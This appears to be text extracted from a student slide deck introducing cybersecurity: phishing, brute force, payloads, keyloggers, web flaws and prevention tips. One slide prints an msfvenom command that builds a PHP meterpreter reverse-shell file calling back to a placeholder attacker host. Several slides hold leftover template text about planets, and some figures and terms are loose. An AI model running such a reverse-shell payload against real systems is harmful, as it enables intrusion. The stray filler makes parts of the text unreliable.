You are on page 1of 14

Cybersecurity

Madhav Mehta
Meet Sehgal
Aditiya Agarwal
Cybersecurity Infographics

Cybersecurity is the practice of protecting


critical systems and sensitive information from
digital attacks. Also known as information
technology (IT) security, cybersecurity
measures are designed to combat threats
against networked systems and applications,
whether those threats originate from inside or
outside of an organization.
TYPES OF HACKS AND ATTACKS

PHISHING WEB –
VISHING PENTESTING

MITM
PAYLOADS

KEYLOGGERS
BRUTEFORCE
PHISHING and SPOOFING

MERCURY MARS
Mercury is the Mars is actually a
smallest planet cold place

VENUS NEPTUNE
Venus has a It’s the farthest
beautiful name planet

JUPITER SATURN
Jupiter is the Yes, Saturn is the
biggest planet ringed one
BRUTEFORCE

01 02 03 04

RECON WORDLIST ATTACK COMPROMISED

FIND A MASSIVE USING API to THE HACKER


EVERYTHING MILLION LONG GENERATE SELLS THE
ABOUT YOUR PASSWORD POSSIBLE INFO OR
TARGET LIST HASHES MISUSE
PAYLOADS AND RANSOMEWARE

A payload is a piece of malicious code that is


designed to execute a specific action on a target
system. This code can take various forms, such as
a virus, worm, or Trojan, and is typically delivered to
the target system through a vulnerability or security
flaw. Once the payload is executed, it can perform a
wide range of actions, such as stealing sensitive
information, disrupting system operations, or taking
control of the target system.
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP>
LPORT=<PORT> -f raw > myshell.php

WAYS MALWARE CAN ENTER YOUR SYSTEM:


1) Cracked Software
2) 3rd Party Software
3) USB flash drive
4) ADWARE etc …..
MITM - WIFI HACKING
WEB APPLICATION

BROKEN
SQL INJECTION
ACCESS
CONTROL

BROKEN AUTH
CSS

DATA
XML EXPOSURE
KEYLOGGERS

Keyloggers are a type of spyware that can


record and steal consecutive keystrokes (and
much more) that the user enters on a device.
Then communicate and send all the captured
info to the hacker.

Types of keyloggers
Software keylogger
Hardware Keylogger
HOW TO PREVENT

PAY AND
DOWNLOAD LEGIT
Double check and SOFTWARE
Verify links NEVER INSTALL
3RD PARTY APPS

USE STRONG
PASSWORD / USE USE ANTIVIRUS
2FA AND FIREWALL

USE FAKE EMAILS


USE VPN , NEVER
EVEYWHERE
CONNECT TO
UNKNOWN
ALWAYS USE
NETWORK
LATEST UPDATE
MYTHS

ANDROID IOS
529 cve 859 cve
ARE YOU REALLY SAFE
A BIG , NOOOO

INSTAGRAM, FACEBOOK , GOOGLE


1 -->ZERO DAY VULN

2 OS Is , OS Xs bugs and vuln

3 NSA and Others


Cybersecurity Infographics

MERCURY VENUS
Mercury is the Venus has a
closest planet beautiful name

JUPITER NEPTUNE
Jupiter is the It’s the
biggest planet farthest planet
Cybersecurity Infographics

NEPTUNE MARS JUPITER


Neptune is the Despite being Jupiter is a gas
farthest planet red, Mars is a giant and the
from the Sun cold place biggest planet

EARTH SATURN MERCURY


Earth is the It’s composed Mercury is the
third planet of hydrogen closest object
from the Sun and helium to the Sun

You might also like